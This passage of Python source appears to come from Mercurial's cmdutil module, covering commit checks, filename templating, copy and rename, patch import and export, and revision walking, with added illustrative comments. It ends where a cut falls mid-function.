def bailifchanged(repo, merge=True, hint=None):
    """enforce the precondition that the working directory must be clean.

    'merge' can be set to false if a pending uncommitted merge should be
    ignored (such as when 'update --check' runs).

    'hint' is the usual hint given to the Abort exception.
    """

    if merge and repo.dirstate.p2() != nullid:
        raise error.Abort(_('outstanding uncommitted merge'), hint=hint)
    modified, added, removed, deleted = repo.status()[:4]
    if modified or added or removed or deleted:
        raise error.Abort(_('uncommitted changes'), hint=hint)
    ctx = repo[None]
    for s in sorted(ctx.substate):
        ctx.sub(s).bailifchanged(hint=hint)
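
# For illustration, a command that must not run with local modifications
# could guard itself with a call like this (sketch):
#
#     bailifchanged(repo, hint=_('use --force to override'))
#
# which raises error.Abort('uncommitted changes') when anything is modified,
# added, removed or deleted, and checks subrepositories recursively.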

def logmessage(ui, opts):
    """get the log message according to the -m and -l options"""
    message = opts.get('message')
    logfile = opts.get('logfile')

    if message and logfile:
        raise error.Abort(_('options --message and --logfile are mutually '
                            'exclusive'))
    if not message and logfile:
        try:
            if isstdiofilename(logfile):
                message = ui.fin.read()
            else:
                message = '\n'.join(util.readfile(logfile).splitlines())
        except IOError as inst:
            raise error.Abort(_("can't read commit message '%s': %s") %
                              (logfile, encoding.strtolocal(inst.strerror)))
    return message
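
# For illustration (hypothetical opts): logmessage(ui, {'message': 'fix bug',
# 'logfile': None}) returns 'fix bug'; with {'message': None, 'logfile': '-'}
# the message is read from ui.fin (stdin); supplying both values raises
# error.Abort.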

def mergeeditform(ctxorbool, baseformname):
    """return appropriate editform name (referencing a committemplate)

    'ctxorbool' is either a ctx to be committed, or a bool indicating whether
    a merge is being committed.

    This returns baseformname with '.merge' appended if it is a merge,
    otherwise '.normal' is appended.
    """
    if isinstance(ctxorbool, bool):
        if ctxorbool:
            return baseformname + ".merge"
    elif 1 < len(ctxorbool.parents()):
        return baseformname + ".merge"

    return baseformname + ".normal"
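
# For illustration: mergeeditform(True, 'commit') evaluates to 'commit.merge'
# and mergeeditform(False, 'commit') to 'commit.normal'; passing a changectx
# instead of a bool keys the choice off whether the ctx has two parents.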

def getcommiteditor(edit=False, finishdesc=None, extramsg=None,
                    editform='', **opts):
    """get appropriate commit message editor according to '--edit' option

    'finishdesc' is a function to be called with the edited commit message
    (= 'description' of the new changeset) just after editing, but
    before checking empty-ness. It should return the actual text to be
    stored into history. This allows the description to be changed before
    it is stored.

    'extramsg' is an extra message to be shown in the editor instead of the
    'Leave message empty to abort commit' line. The 'HG: ' prefix and EOL
    are automatically added.

    'editform' is a dot-separated list of names, to distinguish
    the purpose of commit text editing.

    'getcommiteditor' returns 'commitforceeditor' regardless of
    'edit', if one of 'finishdesc' or 'extramsg' is specified, because
    they are specific to usage in MQ.
    """
    if edit or finishdesc or extramsg:
        return lambda r, c, s: commitforceeditor(r, c, s,
                                                 finishdesc=finishdesc,
                                                 extramsg=extramsg,
                                                 editform=editform)
    elif editform:
        return lambda r, c, s: commiteditor(r, c, s, editform=editform)
    else:
        return commiteditor
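
# For illustration: getcommiteditor() returns the plain commiteditor;
# getcommiteditor(edit=True, editform='commit.normal') returns a callable
# that runs commitforceeditor with that editform; and passing finishdesc or
# extramsg forces the interactive editor even when edit is False.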

def _escapecommandtemplate(tmpl):
    parts = []
    for typ, start, end in templater.scantemplate(tmpl, raw=True):
        if typ == b'string':
            parts.append(stringutil.escapestr(tmpl[start:end]))
        else:
            parts.append(tmpl[start:end])
    return b''.join(parts)
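
# For illustration: _escapecommandtemplate(b'echo {rev}\n') escapes only the
# literal parts, yielding b'echo {rev}\\n', so raw backslashes and control
# characters in plain text survive template parsing while the {rev} keyword
# is still expanded.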

def rendercommandtemplate(ui, tmpl, props):
    r"""Expand a literal template 'tmpl' in a way suitable for command line

    '\' in outermost string is not taken as an escape character because it
    is a directory separator on Windows.

    >>> from . import ui as uimod
    >>> ui = uimod.ui()
    >>> rendercommandtemplate(ui, b'c:\\{path}', {b'path': b'foo'})
    'c:\\foo'
    >>> rendercommandtemplate(ui, b'{"c:\\{path}"}', {'path': b'foo'})
    'c:{path}'
    """
    if not tmpl:
        return tmpl
    t = formatter.maketemplater(ui, _escapecommandtemplate(tmpl))
    return t.renderdefault(props)

def rendertemplate(ctx, tmpl, props=None):
    """Expand a literal template 'tmpl' byte-string against one changeset

    Each props item must be a stringify-able value or a callable returning
    such a value, i.e. no bare list nor dict should be passed.
    """
    repo = ctx.repo()
    tres = formatter.templateresources(repo.ui, repo)
    t = formatter.maketemplater(repo.ui, tmpl, defaults=templatekw.keywords,
                                resources=tres)
    mapping = {'ctx': ctx}
    if props:
        mapping.update(props)
    return t.renderdefault(mapping)
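
# For illustration: rendertemplate(ctx, b'{node|short}') renders the short
# hash of ctx, and makefilename() (below) uses the props argument to make
# values such as {b'seqno': 0} available as the {seqno} template keyword.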

def _buildfntemplate(pat, total=None, seqno=None, revwidth=None, pathname=None):
    r"""Convert old-style filename format string to template string

    >>> _buildfntemplate(b'foo-%b-%n.patch', seqno=0)
    'foo-{reporoot|basename}-{seqno}.patch'
    >>> _buildfntemplate(b'%R{tags % "{tag}"}%H')
    '{rev}{tags % "{tag}"}{node}'

    '\' in outermost strings has to be escaped because it is a directory
    separator on Windows:

    >>> _buildfntemplate(b'c:\\tmp\\%R\\%n.patch', seqno=0)
    'c:\\\\tmp\\\\{rev}\\\\{seqno}.patch'
    >>> _buildfntemplate(b'\\\\foo\\bar.patch')
    '\\\\\\\\foo\\\\bar.patch'
    >>> _buildfntemplate(b'\\{tags % "{tag}"}')
    '\\\\{tags % "{tag}"}'

    but inner strings follow the template rules (i.e. '\' is taken as an
    escape character):

    >>> _buildfntemplate(br'{"c:\tmp"}', seqno=0)
    '{"c:\\tmp"}'
    """
    expander = {
        b'H': b'{node}',
        b'R': b'{rev}',
        b'h': b'{node|short}',
        b'm': br'{sub(r"[^\w]", "_", desc|firstline)}',
        b'r': b'{if(revwidth, pad(rev, revwidth, "0", left=True), rev)}',
        b'%': b'%',
        b'b': b'{reporoot|basename}',
    }
    if total is not None:
        expander[b'N'] = b'{total}'
    if seqno is not None:
        expander[b'n'] = b'{seqno}'
    if total is not None and seqno is not None:
        expander[b'n'] = b'{pad(seqno, total|stringify|count, "0", left=True)}'
    if pathname is not None:
        expander[b's'] = b'{pathname|basename}'
        expander[b'd'] = b'{if(pathname|dirname, pathname|dirname, ".")}'
        expander[b'p'] = b'{pathname}'

    newname = []
    for typ, start, end in templater.scantemplate(pat, raw=True):
        if typ != b'string':
            newname.append(pat[start:end])
            continue
        i = start
        while i < end:
            n = pat.find(b'%', i, end)
            if n < 0:
                newname.append(stringutil.escapestr(pat[i:end]))
                break
            newname.append(stringutil.escapestr(pat[i:n]))
            if n + 2 > end:
                raise error.Abort(_("incomplete format spec in output "
                                    "filename"))
            c = pat[n + 1:n + 2]
            i = n + 2
            try:
                newname.append(expander[c])
            except KeyError:
                raise error.Abort(_("invalid format spec '%%%s' in output "
                                    "filename") % c)
    return ''.join(newname)

def makefilename(ctx, pat, **props):
    if not pat:
        return pat
    tmpl = _buildfntemplate(pat, **props)
    # BUG: alias expansion shouldn't be made against template fragments
    # rewritten from %-format strings, but we have no easy way to partially
    # disable the expansion.
    return rendertemplate(ctx, tmpl, pycompat.byteskwargs(props))

def isstdiofilename(pat):
    """True if the given pat looks like a filename denoting stdin/stdout"""
    return not pat or pat == '-'

class _unclosablefile(object):
    def __init__(self, fp):
        self._fp = fp

    def close(self):
        pass

    def __iter__(self):
        return iter(self._fp)

    def __getattr__(self, attr):
        return getattr(self._fp, attr)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        pass
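
# For illustration: makefileobj() (below) wraps ui.fout in _unclosablefile
# when the pattern names stdio, so a caller can use the result in a 'with'
# block or call close() without actually closing the process's stdout.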

def makefileobj(ctx, pat, mode='wb', **props):
    writable = mode not in ('r', 'rb')

    if isstdiofilename(pat):
        repo = ctx.repo()
        if writable:
            fp = repo.ui.fout
        else:
            fp = repo.ui.fin
        return _unclosablefile(fp)
    fn = makefilename(ctx, pat, **props)
    return open(fn, mode)

def openrevlog(repo, cmd, file_, opts):
    """opens the changelog, manifest, a filelog or a given revlog"""
    cl = opts['changelog']
    mf = opts['manifest']
    dir = opts['dir']
    msg = None
    if cl and mf:
        msg = _('cannot specify --changelog and --manifest at the same time')
    elif cl and dir:
        msg = _('cannot specify --changelog and --dir at the same time')
    elif cl or mf or dir:
        if file_:
            msg = _('cannot specify filename with --changelog or --manifest')
        elif not repo:
            msg = _('cannot specify --changelog or --manifest or --dir '
                    'without a repository')
    if msg:
        raise error.Abort(msg)

    r = None
    if repo:
        if cl:
            r = repo.unfiltered().changelog
        elif dir:
            if 'treemanifest' not in repo.requirements:
                raise error.Abort(_("--dir can only be used on repos with "
                                    "treemanifest enabled"))
            if not dir.endswith('/'):
                dir = dir + '/'
            dirlog = repo.manifestlog._revlog.dirlog(dir)
            if len(dirlog):
                r = dirlog
        elif mf:
            r = repo.manifestlog._revlog
        elif file_:
            filelog = repo.file(file_)
            if len(filelog):
                r = filelog
    if not r:
        if not file_:
            raise error.CommandError(cmd, _('invalid arguments'))
        if not os.path.isfile(file_):
            raise error.Abort(_("revlog '%s' not found") % file_)
        r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
                          file_[:-2] + ".i")
    return r
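
# For illustration (hypothetical invocation): openrevlog(repo, 'debugdata',
# None, {'changelog': True, 'manifest': False, 'dir': ''}) returns the
# unfiltered changelog; passing a tracked filename with all three flags unset
# returns that file's filelog; outside a repository, the corresponding '.i'
# file is opened directly as a revlog.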

def copy(ui, repo, pats, opts, rename=False):
    # called with the repo lock held
    #
    # hgsep => pathname that uses "/" to separate directories
    # ossep => pathname that uses os.sep to separate directories
    cwd = repo.getcwd()
    targets = {}
    after = opts.get("after")
    dryrun = opts.get("dry_run")
    wctx = repo[None]

    def walkpat(pat):
        srcs = []
        if after:
            badstates = '?'
        else:
            badstates = '?r'
        m = scmutil.match(wctx, [pat], opts, globbed=True)
        for abs in wctx.walk(m):
            state = repo.dirstate[abs]
            rel = m.rel(abs)
            exact = m.exact(abs)
            if state in badstates:
                if exact and state == '?':
                    ui.warn(_('%s: not copying - file is not managed\n') % rel)
                if exact and state == 'r':
                    ui.warn(_('%s: not copying - file has been marked for'
                              ' remove\n') % rel)
                continue
            # abs: hgsep
            # rel: ossep
            srcs.append((abs, rel, exact))
        return srcs

    # abssrc: hgsep
    # relsrc: ossep
    # otarget: ossep
    def copyfile(abssrc, relsrc, otarget, exact):
        abstarget = pathutil.canonpath(repo.root, cwd, otarget)
        if '/' in abstarget:
            # We cannot normalize abstarget itself, this would prevent
            # case only renames, like a => A.
            abspath, absname = abstarget.rsplit('/', 1)
            abstarget = repo.dirstate.normalize(abspath) + '/' + absname
        reltarget = repo.pathto(abstarget, cwd)
        target = repo.wjoin(abstarget)
        src = repo.wjoin(abssrc)
        state = repo.dirstate[abstarget]

        scmutil.checkportable(ui, abstarget)

        # check for collisions
        prevsrc = targets.get(abstarget)
        if prevsrc is not None:
            ui.warn(_('%s: not overwriting - %s collides with %s\n') %
                    (reltarget, repo.pathto(abssrc, cwd),
                     repo.pathto(prevsrc, cwd)))
            return

        # check for overwrites
        exists = os.path.lexists(target)
        samefile = False
        if exists and abssrc != abstarget:
            if (repo.dirstate.normalize(abssrc) ==
                repo.dirstate.normalize(abstarget)):
                if not rename:
                    ui.warn(_("%s: can't copy - same file\n") % reltarget)
                    return
                exists = False
                samefile = True

        if not after and exists or after and state in 'mn':
            if not opts['force']:
                if state in 'mn':
                    msg = _('%s: not overwriting - file already committed\n')
                    if after:
                        flags = '--after --force'
                    else:
                        flags = '--force'
                    if rename:
                        hint = _('(hg rename %s to replace the file by '
                                 'recording a rename)\n') % flags
                    else:
                        hint = _('(hg copy %s to replace the file by '
                                 'recording a copy)\n') % flags
                else:
                    msg = _('%s: not overwriting - file exists\n')
                    if rename:
                        hint = _('(hg rename --after to record the rename)\n')
                    else:
                        hint = _('(hg copy --after to record the copy)\n')
                ui.warn(msg % reltarget)
                ui.warn(hint)
                return

        if after:
            if not exists:
                if rename:
                    ui.warn(_('%s: not recording move - %s does not exist\n') %
                            (relsrc, reltarget))
                else:
                    ui.warn(_('%s: not recording copy - %s does not exist\n') %
                            (relsrc, reltarget))
                return
        elif not dryrun:
            try:
                if exists:
                    os.unlink(target)
                targetdir = os.path.dirname(target) or '.'
                if not os.path.isdir(targetdir):
                    os.makedirs(targetdir)
                if samefile:
                    tmp = target + "~hgrename"
                    os.rename(src, tmp)
                    os.rename(tmp, target)
                else:
                    # Preserve stat info on renames, not on copies; this matches
                    # Linux CLI behavior.
                    util.copyfile(src, target, copystat=rename)
                srcexists = True
            except IOError as inst:
                if inst.errno == errno.ENOENT:
                    ui.warn(_('%s: deleted in working directory\n') % relsrc)
                    srcexists = False
                else:
                    ui.warn(_('%s: cannot copy - %s\n') %
                            (relsrc, encoding.strtolocal(inst.strerror)))
                    return True # report a failure

        if ui.verbose or not exact:
            if rename:
                ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
            else:
                ui.status(_('copying %s to %s\n') % (relsrc, reltarget))

        targets[abstarget] = abssrc

        # fix up dirstate
        scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
                             dryrun=dryrun, cwd=cwd)
        if rename and not dryrun:
            if not after and srcexists and not samefile:
                rmdir = repo.ui.configbool('experimental', 'removeemptydirs')
                repo.wvfs.unlinkpath(abssrc, rmdir=rmdir)
            wctx.forget([abssrc])

    # pat: ossep
    # dest: ossep
    # srcs: list of (hgsep, hgsep, ossep, bool)
    # return: function that takes hgsep and returns ossep
    def targetpathfn(pat, dest, srcs):
        if os.path.isdir(pat):
            abspfx = pathutil.canonpath(repo.root, cwd, pat)
            abspfx = util.localpath(abspfx)
            if destdirexists:
                striplen = len(os.path.split(abspfx)[0])
            else:
                striplen = len(abspfx)
            if striplen:
                striplen += len(pycompat.ossep)
            res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
        elif destdirexists:
            res = lambda p: os.path.join(dest,
                                         os.path.basename(util.localpath(p)))
        else:
            res = lambda p: dest
        return res

    # pat: ossep
    # dest: ossep
    # srcs: list of (hgsep, hgsep, ossep, bool)
    # return: function that takes hgsep and returns ossep
    def targetpathafterfn(pat, dest, srcs):
        if matchmod.patkind(pat):
            # a mercurial pattern
            res = lambda p: os.path.join(dest,
                                         os.path.basename(util.localpath(p)))
        else:
            abspfx = pathutil.canonpath(repo.root, cwd, pat)
            if len(abspfx) < len(srcs[0][0]):
                # A directory. Either the target path contains the last
                # component of the source path or it does not.
                def evalpath(striplen):
                    score = 0
                    for s in srcs:
                        t = os.path.join(dest, util.localpath(s[0])[striplen:])
                        if os.path.lexists(t):
                            score += 1
                    return score

                abspfx = util.localpath(abspfx)
                striplen = len(abspfx)
                if striplen:
                    striplen += len(pycompat.ossep)
                if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
                    score = evalpath(striplen)
                    striplen1 = len(os.path.split(abspfx)[0])
                    if striplen1:
                        striplen1 += len(pycompat.ossep)
                    if evalpath(striplen1) > score:
                        striplen = striplen1
                res = lambda p: os.path.join(dest,
                                             util.localpath(p)[striplen:])
            else:
                # a file
                if destdirexists:
                    res = lambda p: os.path.join(dest,
                                        os.path.basename(util.localpath(p)))
                else:
                    res = lambda p: dest
        return res

    pats = scmutil.expandpats(pats)
    if not pats:
        raise error.Abort(_('no source or destination specified'))
    if len(pats) == 1:
        raise error.Abort(_('no destination specified'))
    dest = pats.pop()
    destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
    if not destdirexists:
        if len(pats) > 1 or matchmod.patkind(pats[0]):
            raise error.Abort(_('with multiple sources, destination must be an '
                                'existing directory'))
        if util.endswithsep(dest):
            raise error.Abort(_('destination %s is not a directory') % dest)

    tfn = targetpathfn
    if after:
        tfn = targetpathafterfn
    copylist = []
    for pat in pats:
        srcs = walkpat(pat)
        if not srcs:
            continue
        copylist.append((tfn(pat, dest, srcs), srcs))
    if not copylist:
        raise error.Abort(_('no files to copy'))

    errors = 0
    for targetpath, srcs in copylist:
        for abssrc, relsrc, exact in srcs:
            if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
                errors += 1

    if errors:
        ui.warn(_('(consider using --after)\n'))

    return errors != 0

## facility to let extensions process additional data into an import patch
# list of identifiers to be executed in order
extrapreimport = [] # run before commit
extrapostimport = [] # run after commit
# mapping from identifier to actual import function
#
# 'preimport' are run before the commit is made and are provided the following
# arguments:
# - repo: the localrepository instance,
# - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
# - extra: the future extra dictionary of the changeset, please mutate it,
# - opts: the import options.
# XXX ideally, we would just pass a ctx ready to be computed, that would allow
# mutation of the in-memory commit and more. Feel free to rework the code to
# get there.
extrapreimportmap = {}
# 'postimport' are run after the commit is made and are provided the following
# argument:
# - ctx: the changectx created by import.
extrapostimportmap = {}
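
# For illustration, an extension could register a preimport hook along these
# lines ('recordsource' is a made-up identifier, shown as a sketch):
#
#     def _recordsource(repo, patchdata, extra, opts):
#         extra['source'] = patchdata.get('nodeid', '')
#     extrapreimport.append('recordsource')
#     extrapreimportmap['recordsource'] = _recordsource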

def tryimportone(ui, repo, patchdata, parents, opts, msgs, updatefunc):
    """Utility function used by commands.import to import a single patch

    This function is explicitly defined here to help the evolve extension to
    wrap this part of the import logic.

    The API is currently a bit ugly because it is a simple code translation
    from the import command. Feel free to make it better.

    :patchdata: a dictionary containing parsed patch data (such as from
                ``patch.extract()``)
    :parents: nodes that will be the parents of the created commit
    :opts: the full dict of options passed to the import command
    :msgs: list to save commit message to.
           (used in case we need to save it when failing)
    :updatefunc: a function that updates a repo to a given node
                 updatefunc(<repo>, <node>)
    """
    # avoid cycle context -> subrepo -> cmdutil
    from . import context

    tmpname = patchdata.get('filename')
    message = patchdata.get('message')
    user = opts.get('user') or patchdata.get('user')
    date = opts.get('date') or patchdata.get('date')
    branch = patchdata.get('branch')
    nodeid = patchdata.get('nodeid')
    p1 = patchdata.get('p1')
    p2 = patchdata.get('p2')

    nocommit = opts.get('no_commit')
    importbranch = opts.get('import_branch')
    update = not opts.get('bypass')
    strip = opts["strip"]
    prefix = opts["prefix"]
    sim = float(opts.get('similarity') or 0)

    if not tmpname:
        return None, None, False

    rejects = False

    cmdline_message = logmessage(ui, opts)
    if cmdline_message:
        # pickup the cmdline msg
        message = cmdline_message
    elif message:
        # pickup the patch msg
        message = message.strip()
    else:
        # launch the editor
        message = None
    ui.debug('message:\n%s\n' % (message or ''))

    if len(parents) == 1:
        parents.append(repo[nullid])
    if opts.get('exact'):
        if not nodeid or not p1:
            raise error.Abort(_('not a Mercurial patch'))
        p1 = repo[p1]
        p2 = repo[p2 or nullid]
    elif p2:
        try:
            p1 = repo[p1]
            p2 = repo[p2]
            # Without any options, consider p2 only if the
            # patch is being applied on top of the recorded
            # first parent.
            if p1 != parents[0]:
                p1 = parents[0]
                p2 = repo[nullid]
        except error.RepoError:
            p1, p2 = parents
        if p2.node() == nullid:
            ui.warn(_("warning: import the patch as a normal revision\n"
                      "(use --exact to import the patch as a merge)\n"))
    else:
        p1, p2 = parents

    n = None
    if update:
        if p1 != parents[0]:
            updatefunc(repo, p1.node())
        if p2 != parents[1]:
            repo.setparents(p1.node(), p2.node())

        if opts.get('exact') or importbranch:
            repo.dirstate.setbranch(branch or 'default')

        partial = opts.get('partial', False)
        files = set()
        try:
            patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
                        files=files, eolmode=None, similarity=sim / 100.0)
        except error.PatchError as e:
            if not partial:
                raise error.Abort(pycompat.bytestr(e))
            if partial:
                rejects = True

        files = list(files)
        if nocommit:
            if message:
                msgs.append(message)
        else:
            if opts.get('exact') or p2:
                # If you got here, you either use --force and know what
                # you are doing or used --exact or a merge patch while
                # being updated to its first parent.
                m = None
            else:
                m = scmutil.matchfiles(repo, files or [])
            editform = mergeeditform(repo[None], 'import.normal')
            if opts.get('exact'):
                editor = None
            else:
                editor = getcommiteditor(editform=editform,
                                         **pycompat.strkwargs(opts))
            extra = {}
            for idfunc in extrapreimport:
                extrapreimportmap[idfunc](repo, patchdata, extra, opts)
            overrides = {}
            if partial:
                overrides[('ui', 'allowemptycommit')] = True
            with repo.ui.configoverride(overrides, 'import'):
                n = repo.commit(message, user,
                                date, match=m,
                                editor=editor, extra=extra)
                for idfunc in extrapostimport:
                    extrapostimportmap[idfunc](repo[n])
    else:
        if opts.get('exact') or importbranch:
            branch = branch or 'default'
        else:
            branch = p1.branch()
        store = patch.filestore()
        try:
            files = set()
            try:
                patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
                                files, eolmode=None)
            except error.PatchError as e:
                raise error.Abort(stringutil.forcebytestr(e))
            if opts.get('exact'):
                editor = None
            else:
                editor = getcommiteditor(editform='import.bypass')
            memctx = context.memctx(repo, (p1.node(), p2.node()),
                                    message,
                                    files=files,
                                    filectxfn=store,
                                    user=user,
                                    date=date,
                                    branch=branch,
                                    editor=editor)
            n = memctx.commit()
        finally:
            store.close()
    if opts.get('exact') and nocommit:
        # --exact with --no-commit is still useful in that it does merge
        # and branch bits
        ui.warn(_("warning: can't check exact import with --no-commit\n"))
    elif opts.get('exact') and (not n or hex(n) != nodeid):
        raise error.Abort(_('patch is damaged or loses information'))
    msg = _('applied to working directory')
    if n:
        # i18n: refers to a short changeset id
        msg = _('created %s') % short(n)
    return msg, n, rejects

# facility to let extensions include additional data in an exported patch
# list of identifiers to be executed in order
extraexport = []
# mapping from identifier to actual export function
# each function has to return a string to be added to the header, or None
# it is given two arguments (sequencenumber, changectx)
extraexportmap = {}
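
# For illustration, an extension could add a header to every exported
# changeset along these lines ('seqheader' is a made-up identifier, shown as
# a sketch):
#
#     def _seqheader(seqno, ctx):
#         return 'Patch-Index %d' % seqno
#     extraexport.append('seqheader')
#     extraexportmap['seqheader'] = _seqheader
#
# Returning None instead suppresses the header for that changeset.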

def _exportsingle(repo, ctx, fm, match, switch_parent, seqno, diffopts):
    node = scmutil.binnode(ctx)
    parents = [p.node() for p in ctx.parents() if p]
    branch = ctx.branch()
    if switch_parent:
        parents.reverse()

    if parents:
        prev = parents[0]
    else:
        prev = nullid

    fm.context(ctx=ctx)
    fm.plain('# HG changeset patch\n')
    fm.write('user', '# User %s\n', ctx.user())
    fm.plain('# Date %d %d\n' % ctx.date())
    fm.write('date', '# %s\n', fm.formatdate(ctx.date()))
    fm.condwrite(branch and branch != 'default',
                 'branch', '# Branch %s\n', branch)
    fm.write('node', '# Node ID %s\n', hex(node))
    fm.plain('# Parent %s\n' % hex(prev))
    if len(parents) > 1:
        fm.plain('# Parent %s\n' % hex(parents[1]))
    fm.data(parents=fm.formatlist(pycompat.maplist(hex, parents), name='node'))

    # TODO: redesign extraexportmap function to support formatter
    for headerid in extraexport:
        header = extraexportmap[headerid](seqno, ctx)
        if header is not None:
            fm.plain('# %s\n' % header)

    fm.write('desc', '%s\n', ctx.description().rstrip())
    fm.plain('\n')

    if fm.isplain():
        chunkiter = patch.diffui(repo, prev, node, match, opts=diffopts)
        for chunk, label in chunkiter:
            fm.plain(chunk, label=label)
    else:
        chunkiter = patch.diff(repo, prev, node, match, opts=diffopts)
        # TODO: make it structured?
        fm.data(diff=b''.join(chunkiter))

def _exportfile(repo, revs, fm, dest, switch_parent, diffopts, match):
    """Export changesets to stdout or a single file"""
    for seqno, rev in enumerate(revs, 1):
        ctx = repo[rev]
        if not dest.startswith('<'):
            repo.ui.note("%s\n" % dest)
        fm.startitem()
        _exportsingle(repo, ctx, fm, match, switch_parent, seqno, diffopts)

def _exportfntemplate(repo, revs, basefm, fntemplate, switch_parent, diffopts,
                      match):
    """Export changesets to possibly multiple files"""
    total = len(revs)
    revwidth = max(len(str(rev)) for rev in revs)
    filemap = util.sortdict() # filename: [(seqno, rev), ...]

    for seqno, rev in enumerate(revs, 1):
        ctx = repo[rev]
        dest = makefilename(ctx, fntemplate,
                            total=total, seqno=seqno, revwidth=revwidth)
        filemap.setdefault(dest, []).append((seqno, rev))

    for dest in filemap:
        with formatter.maybereopen(basefm, dest) as fm:
            repo.ui.note("%s\n" % dest)
            for seqno, rev in filemap[dest]:
                fm.startitem()
                ctx = repo[rev]
                _exportsingle(repo, ctx, fm, match, switch_parent, seqno,
                              diffopts)

def export(repo, revs, basefm, fntemplate='hg-%h.patch', switch_parent=False,
           opts=None, match=None):
    '''export changesets as hg patches

    Args:
      repo: The repository from which we're exporting revisions.
      revs: A list of revisions to export as revision numbers.
      basefm: A formatter to which patches should be written.
      fntemplate: An optional string to use for generating patch file names.
      switch_parent: If True, show diffs against second parent when not nullid.
        Default is false, which always shows diff against p1.
      opts: diff options to use for generating the patch.
      match: If specified, only export changes to files matching this matcher.

    Returns:
      Nothing.

    Side Effect:
      "HG Changeset Patch" data is emitted to one of the following
      destinations:
        fntemplate specified: Each rev is written to a unique file named using
                              the given template.
        Otherwise: All revs will be written to basefm.
    '''
    scmutil.prefetchfiles(repo, revs, match)

    if not fntemplate:
        _exportfile(repo, revs, basefm, '<unnamed>', switch_parent, opts, match)
    else:
        _exportfntemplate(repo, revs, basefm, fntemplate, switch_parent, opts,
                          match)
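
# For illustration: with the default fntemplate 'hg-%h.patch', export() names
# each output file after the changeset's short hash (via %h -> {node|short}
# in _buildfntemplate), while an empty fntemplate streams every patch to
# basefm through _exportfile() instead.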

def exportfile(repo, revs, fp, switch_parent=False, opts=None, match=None):
    """Export changesets to the given file stream"""
    scmutil.prefetchfiles(repo, revs, match)

    dest = getattr(fp, 'name', '<unnamed>')
    with formatter.formatter(repo.ui, fp, 'export', {}) as fm:
        _exportfile(repo, revs, fm, dest, switch_parent, opts, match)

def showmarker(fm, marker, index=None):
    """utility function to display obsolescence marker in a readable way

    To be used by debug function."""
    if index is not None:
        fm.write('index', '%i ', index)
    fm.write('prednode', '%s ', hex(marker.prednode()))
    succs = marker.succnodes()
    fm.condwrite(succs, 'succnodes', '%s ',
                 fm.formatlist(map(hex, succs), name='node'))
    fm.write('flag', '%X ', marker.flags())
    parents = marker.parentnodes()
    if parents is not None:
        fm.write('parentnodes', '{%s} ',
                 fm.formatlist(map(hex, parents), name='node', sep=', '))
    fm.write('date', '(%s) ', fm.formatdate(marker.date()))
    meta = marker.metadata().copy()
    meta.pop('date', None)
    smeta = util.rapply(pycompat.maybebytestr, meta)
    fm.write('metadata', '{%s}', fm.formatdict(smeta, fmt='%r: %r', sep=', '))
    fm.plain('\n')
1685
1686
1686 def finddate(ui, repo, date):
1687 def finddate(ui, repo, date):
1687 """Find the tipmost changeset that matches the given date spec"""
1688 """Find the tipmost changeset that matches the given date spec"""
1688
1689
1689 df = dateutil.matchdate(date)
1690 df = dateutil.matchdate(date)
1690 m = scmutil.matchall(repo)
1691 m = scmutil.matchall(repo)
1691 results = {}
1692 results = {}
1692
1693
1693 def prep(ctx, fns):
1694 def prep(ctx, fns):
1694 d = ctx.date()
1695 d = ctx.date()
1695 if df(d[0]):
1696 if df(d[0]):
1696 results[ctx.rev()] = d
1697 results[ctx.rev()] = d
1697
1698
1698 for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
1699 for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
1699 rev = ctx.rev()
1700 rev = ctx.rev()
1700 if rev in results:
1701 if rev in results:
1701 ui.status(_("found revision %s from %s\n") %
1702 ui.status(_("found revision %s from %s\n") %
1702 (rev, dateutil.datestr(results[rev])))
1703 (rev, dateutil.datestr(results[rev])))
1703 return '%d' % rev
1704 return '%d' % rev
1704
1705
1705 raise error.Abort(_("revision matching date not found"))
1706 raise error.Abort(_("revision matching date not found"))
1706
1707
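
# Illustrative usage (hypothetical values): finddate() drives
# walkchangerevs() with a prepare callback and returns the matching
# revision number as a string, e.g.
#
#   rev = finddate(ui, repo, '2018-06-01')   # e.g. '42'
#   ctx = repo[rev]
#
# or raises Abort when no changeset matches the date spec.
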
def increasingwindows(windowsize=8, sizelimit=512):
    while True:
        yield windowsize
        if windowsize < sizelimit:
            windowsize *= 2
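
# Doctest-style sketch (illustrative): window sizes grow geometrically and
# saturate at sizelimit, so early results stream quickly while later
# batches stay efficient:
#
#   >>> gen = increasingwindows()
#   >>> [next(gen) for _ in range(8)]
#   [8, 16, 32, 64, 128, 256, 512, 512]
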
def _walkrevs(repo, opts):
    # Default --rev value depends on --follow but --follow behavior
    # depends on revisions resolved from --rev...
    follow = opts.get('follow') or opts.get('follow_first')
    if opts.get('rev'):
        revs = scmutil.revrange(repo, opts['rev'])
    elif follow and repo.dirstate.p1() == nullid:
        revs = smartset.baseset()
    elif follow:
        revs = repo.revs('reverse(:.)')
    else:
        revs = smartset.spanset(repo)
        revs.reverse()
    return revs
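
# Illustrative mapping (assuming log-style opts): {'rev': ['1.0::tip']}
# resolves through revrange(); {'follow': True} on a non-null working
# parent gives reverse(:.); an empty opts dict yields every revision in
# the repository, newest first.
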
class FileWalkError(Exception):
    pass

def walkfilerevs(repo, match, follow, revs, fncache):
    '''Walks the file history for the matched files.

    Returns the changeset revs that are involved in the file history.

    Throws FileWalkError if the file history can't be walked using
    filelogs alone.
    '''
    wanted = set()
    copies = []
    minrev, maxrev = min(revs), max(revs)
    def filerevgen(filelog, last):
        """
        Only files, no patterns. Check the history of each file.

        Examines filelog entries within minrev, maxrev linkrev range
        Returns an iterator yielding (linkrev, parentlinkrevs, copied)
        tuples in backwards order
        """
        cl_count = len(repo)
        revs = []
        for j in xrange(0, last + 1):
            linkrev = filelog.linkrev(j)
            if linkrev < minrev:
                continue
            # only yield rev for which we have the changelog, it can
            # happen while doing "hg log" during a pull or commit
            if linkrev >= cl_count:
                break

            parentlinkrevs = []
            for p in filelog.parentrevs(j):
                if p != nullrev:
                    parentlinkrevs.append(filelog.linkrev(p))
            n = filelog.node(j)
